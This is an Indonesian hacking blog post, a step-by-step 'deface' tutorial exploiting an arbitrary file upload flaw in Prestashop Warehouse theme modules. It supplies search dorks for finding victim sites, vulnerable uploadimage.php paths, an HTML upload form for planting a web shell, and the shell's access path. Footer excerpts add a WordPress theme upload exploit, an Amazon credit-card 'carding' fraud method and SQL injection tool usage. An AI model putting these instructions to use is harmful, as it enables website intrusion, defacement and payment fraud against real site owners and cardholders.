Skip to main content

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload


halo bertemu lagi dengan saya ,uyulcrack.. 
udah lama nih ga upload,,, biasa terlalu sibuk di dunia nyata. 
oke,, lanjut saja nih Tutorial Deface eXploit Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload . *exploit baru nanti dijelaskan dibawah. 
Dan makasih juga untuk bang People_hurt untuk live targetnya ....


Langsung ke tutor


#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Fixed in Version : -
#- Tested on : windows , Linux , Other

Dork:
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"


masih bisa dikembangkan, cari /modules/namamoduleyglaen *Use your brain br0

1. disini gua jelasinnya lu pada udah ada CSRF nya ya jadi langsung praktek aja, pertama cari dulu target lwt Dorking di Search Engine 


2. kalo dah ketemu masukin deh exploit nya satu-satu sampe ketemu ERROR
Exploit &poc : 
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"
(TERGANTUNG PAS DORKING namamodule NYA)

3. Vulnerability ~ dari kemaren sih, kalo gak error ya Blank *kalau ada cth yg lain yg menandakan vuln pada eXploit ini, silahkan ksh tau dikolom komentar


target.coli/[path]/modules/namamodule/uploadimage.php

4. nah dibawah ini CSRF nya, masukin aja sourcodenya dan ubah format ke HTML

CSRF: 

<form method="POST" action="target.co.li/modules/namamodule/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

5. kalo udah buka deh CSRF nya pake browser kesukaan sobat 

Upload File/Shell Lu

6. kalo sukses upload bakalan kayak gini


Muncul Nama Shell/File yg Lu Upload

7. akses shell target.co.li/modules/namamodule/slides/namashellLu 


target.coli/[path]/modules/namamodule/slides/namashellLu

nah setelah itu terserah sobat dah maudiapain, saran dari gua sih titip file aja ama laporin bugnya, jangan salah digunainyaa , gua cuman share apa yang gua bisa dan live praktek gua sendiri jadi kecelakaan ditanggung oleh situ bukan pengarang .... 
ayo Jangan Jadi Silent Reader, minimal kalo gak mau komen, tolong bagikan yak >.<"
atau Like fanspage gua: UyulCrack | Orthellys
Like juga fanspage TKJ Cyber Art | kalau ada yg mau bertanya, terus atau kasih saran dan kritikan Silahkan kirim ke wall FP kami *kritikan dan saran yg membangun ya gengs.

Semoga bermanfaat & Membantu Sobat..
sampai ketemu lagi BAAAYYYYY .....

source and thanks to: People_hurt


uyulcrack


Kami Membuat Sejarah, Bukan hanya Barisan Kisah #staycoolandkeep./crootz





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Comments

Popular posts from this blog

eXploit WP Themes Brainstorm Arbitrary File Upload Vulnerability

Hello World ; Malam Fans, Please Say Hello Haters :* xixixhi, Nuenomaru disini,  Sekarang Nue akan Share   Tutorial Deface dengan eXploit WP Themes Brainstorm Arbitrary File Upload Vulnerability * ini exploit lama sih wkwkw exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress. iseng2 aja share, Kali aja masih  crotz  wkwkw * yg master minggir dlu ;* Lanjut intip tutor ae gaes :* mau sampai kapan ?! Dork: inurl:/wp-content/themes/brainstorm (Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan) 1. Dorking di search Engine 2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya. exploit: /[path]/ /wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php 3. Vulnerability ~ Blank Kurang lebih sih gituh awkkaw~ 4. Buat File Baru Berekstensi .php Contoh brain.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan t...

Method Amazon Terbaru + Seller

Hallo Sobat Cyber, Kali Ini Saya Akan Membagikan Method AMAZON. Mungkin Sobat Sudah Pada Tahu Apa Itu AMAZON, Dan Sudah Tahu Juga Method AMAZON Bagi Yang Hoby Carding. Tapi Masih Ada Juga Sobat Yang Belom Tahu Method Untuk Carding Di AMAZON. Bagi Sobat Yang Penasaran Method Amazon, Silahkan Ikuti Tutorial Dari Saya, Cekidot : Alat Tempurnya : Akun Amazon VPN Premium, ane sih pake hma Jika sobat punya akun uk,fr,de,it,dll. loginnya di amazon . com aja, pake seller yang dibawah, jadi misalkan agan punya akun IT, akun itu gaperlu selalu login di amazon.it, di amazon . com juga bisa.Tapi jika sobat punya seller sendiri sillahkan gunakan :D boleh di amazon manapun :v Jika sobat co sebaiknya 1 1 dulu, setelah prepairing silahkan order lagi.   METHODE PAKE AKUN BULE (BILL=SHIP) : -Siapkan akun amazon live pastinya harus have card -Connect VPN sesuai negara cc akunnya, lalu clear cookies and chache - Terus Buka Check2ip.com dan atur tanggal dan waktu nya agar tidak ada yang merah -Bu...

How To Install Xpath Automated Sqli tool on Windows

Assalamualaikum warohmatullah wabarokatuh ^_^ Download Xpath Automated Sqli tool Mirror 1 Mirror 2 Bahan-Bahan : -Python27 -Prettytable -Requests -Colorama Langkah-langkahnya soub : 1. Install Python :v 2. Install Module  [ Prettytable ] Buka CMD, Masuk ke Directory C:/Python27/Scripts kemudian eksekusi perintah berikut : C:\Python27\Scripts>pip install prettytable 3. Install Module [ Requests ] Buka CMD, Masuk ke Directory C:/Python27/Scripts kemudian eksekusi perintah berikut : C:\Python27\Scripts>pip install requests 4. Install Module [ Colorama ] Buka CMD, Masuk ke Directory C:/Python27/Scripts kemudian eksekusi perintah berikut : C:\Python27\Scripts>pip install colorama 5.  Berhasil Terinstall ^_^ Cara pemakaiannya : xpath.py -u http://www.test.com/index.php?id=1 --dbs xpath.py -u http://www.test.com/ --data "index.php?id=1" --dbs Yang Mau bertanya silahkan di kolom komentar